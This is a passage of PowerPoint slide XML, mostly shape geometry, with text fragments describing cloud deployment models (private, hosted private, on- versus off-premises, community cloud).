                    <a:pt x="4311505" y="58346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="95503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="573023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="573023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="95503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7510" y="58346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27987" y="27987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58346" y="7510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95503" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19049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2052320" y="5911088"/>
            <a:ext cx="193548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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Host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Priv</a:t>
            </a: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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>te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847469" y="6334125"/>
            <a:ext cx="12563475" cy="1099820"/>
            <a:chOff x="1847469" y="6334125"/>
            <a:chExt cx="12563475" cy="1099820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="6343650"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="12455271" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124552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856994" y="6343650"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773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2052320" y="6688581"/>
            <a:ext cx="981202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private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instance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operated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by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CSPs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dedicated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single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consumer.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90691" y="306451"/>
            <a:ext cx="467233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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deployment</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="180">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Models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5276" y="760476"/>
            <a:ext cx="6516624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847469" y="2758820"/>
            <a:ext cx="12563475" cy="1823720"/>
            <a:chOff x="1847469" y="2758820"/>
            <a:chExt cx="12563475" cy="1823720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1869186" y="2768345"/>
              <a:ext cx="4319270" cy="544195"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="544195">
                  <a:moveTo>
                    <a:pt x="4228338" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90677" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55399" y="7131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26574" y="26574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7131" y="55399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="90677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="544067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="544067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="90677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311884" y="55399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4292441" y="26574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4263616" y="7131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4228338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869186" y="2768345"/>
              <a:ext cx="4319270" cy="544195"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="544195">
                  <a:moveTo>
                    <a:pt x="90677" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4228338" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4263616" y="7131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4292441" y="26574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311884" y="55399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="90677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="544067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="544067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="90677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7131" y="55399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26574" y="26574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55399" y="7131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90677" y="0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856994" y="3236213"/>
              <a:ext cx="12544425" cy="1336675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1336675">
                  <a:moveTo>
                    <a:pt x="12434189" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="109855" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67079" y="8628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32162" y="32162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8628" y="67079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="109855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1226693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8628" y="1269468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32162" y="1304385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67079" y="1327919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109855" y="1336548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12434189" y="1336548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12476964" y="1327919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511881" y="1304385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535415" y="1269468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1226693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="109855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535415" y="67079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511881" y="32162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12476964" y="8628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12434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856994" y="3236213"/>
              <a:ext cx="12544425" cy="1336675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1336675">
                  <a:moveTo>
                    <a:pt x="0" y="109855"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8628" y="67079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32162" y="32162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67079" y="8628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109855" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12434189" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12476964" y="8628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511881" y="32162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535415" y="67079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="109855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1226693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535415" y="1269468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511881" y="1304385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12476964" y="1327919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12434189" y="1336548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109855" y="1336548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67079" y="1327919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32162" y="1304385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8628" y="1269468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1226693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="109855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052320" y="2802762"/>
            <a:ext cx="9311005" cy="13677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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Private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265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This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service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completely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owned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operated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by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organization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itself.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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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premi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vs.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ff</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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premi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es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847469" y="4782692"/>
            <a:ext cx="12563475" cy="1567815"/>
            <a:chOff x="1847469" y="4782692"/>
            <a:chExt cx="12563475" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="5260085"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="12455271" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124552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856994" y="5260085"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773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869186" y="4792217"/>
              <a:ext cx="4319270" cy="532130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="532129">
                  <a:moveTo>
                    <a:pt x="4230370" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88645" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="531876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="531876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312040" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4293028" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4264848" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4230370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869186" y="4792217"/>
              <a:ext cx="4319270" cy="532130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="532129">
                  <a:moveTo>
                    <a:pt x="88645" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4230370" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4264848" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4293028" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312040" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="531876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="531876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="0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2052320" y="4827270"/>
            <a:ext cx="153860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Community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67508" y="5629783"/>
            <a:ext cx="1084326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place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where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organizations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share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costs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hosted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(public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private)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cloud.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874901" y="6617589"/>
            <a:ext cx="12561570" cy="1567815"/>
            <a:chOff x="1874901" y="6617589"/>
            <a:chExt cx="12561570" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1884426" y="7096506"/>
              <a:ext cx="12542520" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12542519" h="1079500">
                  <a:moveTo>
                    <a:pt x="12453874" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88646" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12453874" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12488352" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516532" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535544" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542520" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542520" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535544" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516532" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12488352" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124538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884426" y="7096506"/>
              <a:ext cx="12542520" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12542519" h="1079500">
                  <a:moveTo>
                    <a:pt x="0" y="88646"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12453874" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12488352" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516532" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535544" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542520" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542520" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535544" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12516532" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12488352" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12453874" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646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895094" y="6627114"/>
              <a:ext cx="4320540" cy="494030"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="494029">
                  <a:moveTo>
                    <a:pt x="4238244" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82295" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50256" y="6465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24098" y="24098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6465" y="50256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="82296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="493776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="493776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="82296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4314074" y="50256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296441" y="24098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4270283" y="6465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4238244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895094" y="6627114"/>
              <a:ext cx="4320540" cy="494030"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="494029">
                  <a:moveTo>
                    <a:pt x="82295" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4238244" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4270283" y="6465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296441" y="24098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4314074" y="50256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="82296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="493776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="493776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="82296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6465" y="50256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24098" y="24098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50256" y="6465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82295" y="0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001012" y="6675120"/>
              <a:ext cx="4213860" cy="429895"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4213860" h="429895">
                  <a:moveTo>
                    <a:pt x="0" y="429767"/>
                  </a:moveTo>
